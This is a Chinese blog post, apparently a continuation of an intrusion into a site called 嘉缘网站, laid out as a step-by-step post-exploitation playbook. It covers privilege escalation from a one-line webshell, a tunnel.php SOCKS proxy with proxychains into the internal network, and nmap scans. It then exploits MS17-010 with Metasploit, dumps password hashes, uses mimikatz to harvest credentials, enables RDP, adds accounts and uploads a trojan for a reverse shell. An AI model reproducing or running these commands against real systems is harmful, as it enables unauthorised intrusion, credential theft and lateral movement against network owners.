这篇是由上篇 【渗透过程】嘉缘网站--测试
https://www.cnblogs.com/G-Shadow/articles/10964374.html
之后的操作,文章包括了提权,HTTP代理及对内网的渗透
使用蚁剑连接上写入的一句话后,使用虚拟终端发现自己权限为最高权限可以执行任何操作
这里讲一下提权,假如权限不高,需要进行提权
首先:查看服务器的操作系统
如果这里为win2003,可以找台2003的机器把cmd.exe程序上传到目标服务器
跳到该目录下执行cmd 你会发现权限权限有所提升,可以执行一下基础命令,但是还是无法执行新建用户,开启3389端口等命令
这时我们只需上传提权工具如pr 巴西烤肉等
使用提取权工具进行命令的执行,这样我们就达到提权的目的了
接着上篇,当我们使用蚁剑进行执行Dos命令发现目标服务器存在2块网卡
(这里蚁剑如果无法执行命令,可以上传一个大马)
而且发现在238段下还有内网服务器
arp -a
需要进行挂代理,只有这样才能对内网服务器进行测试
代理设置:
(因为要对内网进行其他操作,所有这里只介绍如何给kali进行代理设置)
首先安装:
安装插件
安装完成后
这里需要通过菜刀或蚁剑上传所需的文件(网站为php站这里上传tunnel.php)
上传成功后进行监听 ,监听的终端不能关需要一直开启
再次开启一个终端 修改配置文件
把dynamic_chain前的#删掉
同时在最下方加入 socks5 127.0.0.1 9632(这里的9632为你上方监听的端口)之后退出保存
通过打开的网页访问内网IP 192.168.238.128 这时进行监听的终端开始跑了并成功显示探针 说明代理设置成功
如果监听的终端没有变化,网页也没显示,需要进行以下操作,之后再次从终端打开浏览器
如果还不成功,请关机,从新启动一下kali (修改的配置没有运行成功,需要重启)
添加路由 route add -net 192.168.90.0 netmask 255.255.255.0 dev eth0 route add -net 192.168.80.0 netmask 255.255.255.0 dev eth0 route add -net 192.168.90.0/24 gw 192.168.90.1 删除路由 route del -net 192.168.80.0 netmask 255.255.255.0 dev eth0
内网渗透
针对445端口
代理成功后,每此执行命令或使用软件时 在命令前加上 proxychains
之后使用nmap开始对 192.168.238.129 129.168.238.130 进行端口扫描
proxychains nmap -vvv -n -sT -PN 192.168.238.129 proxychains nmap -vvv -n -sT -PN 192.168.238.130
发现2个都开135 139 445端口 这里只对445进行
192.168.238.129
192.168.238.130
对192.168.238.129:445
使用kali的工具
proxychains msfconsole //启动MSF终端
使用攻击模块
search option //搜索相关工具和攻击载荷 use use exploit/windows/smb/ms17_010_psexec //启动该模块 show options //查看相关信息
set RHOST 目标IP
set LHOST 本机IP
set threads 端口
exploit //执行 或者用run
执行成功后会返回meterpreter 当执行命令有可能不会回显,因为有代理有可能返回的包会丢失 但是命令会执行
我们尝试直接利用 getuid 和 getsystem 命令来提权
使用命令获取hash值
run post/windows/gather/smart_hashdump
通过撞库得到administrator的密码
使用得到密码和账户使用kaili的远程桌面进行连接
proxychains rdesktop IP //远程连接 目标机需要开启3389端口
run post/windows/manage/enable_rdp //开启3389
run getgui -u xxxxx -p xxxxx //添加用户
download c:\\1.txt //下载文件
upload ll.txt c:\ //上传文件
cat 11.txt //查看文件
pwd //查询当前路径
sysinfo //显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息
介绍个神器 mimikatz :
load mimikatz
msv (获取 hash 值)
ssp (获取明文信息)
wdigest (获取系统账户信息)
mimikatz_command -f a:: (必须要以错误的模块来让正确的模块显示)
mimikatz_command -f hash:: (获取目标 hash)
如果直接使用开启3389端口命令无法执行的话,可以在本地生产一个木马文件通过上传一个木马文件
创建会话反弹会一个shell
从新开启一个终端
同时使用另一个终端上传生成的exe程序 并执行